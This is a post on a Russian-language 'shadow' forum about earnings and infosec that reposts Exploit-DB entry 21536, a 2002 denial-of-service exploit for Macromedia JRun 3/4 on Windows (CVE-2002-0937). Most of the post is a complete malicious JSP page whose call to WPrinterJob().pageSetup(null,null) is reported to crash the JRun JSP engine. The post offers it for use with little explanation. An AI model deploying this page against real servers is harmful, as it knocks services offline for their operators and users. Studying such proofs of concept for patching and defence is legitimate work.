Macromedia JRun 3/4 JSP Engine - Denial of Service | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 21536

Проверка EDB

Пройдено

Автор: MARC SCHOENEFELD

Тип уязвимости: DOS

Платформа: WINDOWS

CVE: cve-2002-0937

Дата публикации: 2002-06-12

Код:

source: https://www.securityfocus.com/bid/4997/info

A vulnerability has been reported in Macromedia JRun for Windows that results in a denial of service condition. The vulnerability occurs when JRun encounters a malicious JSP page.

The following snippet of code is reported to crash the JRun JSP engine:
new WPrinterJob().pageSetup(null,null);

<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>

<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>

</body>
</html>

Источник: www.exploit-db.com

Поиск

Exploit Macromedia JRun 3/4 JSP Engine - Denial of Service

Exploiter

Похожие темы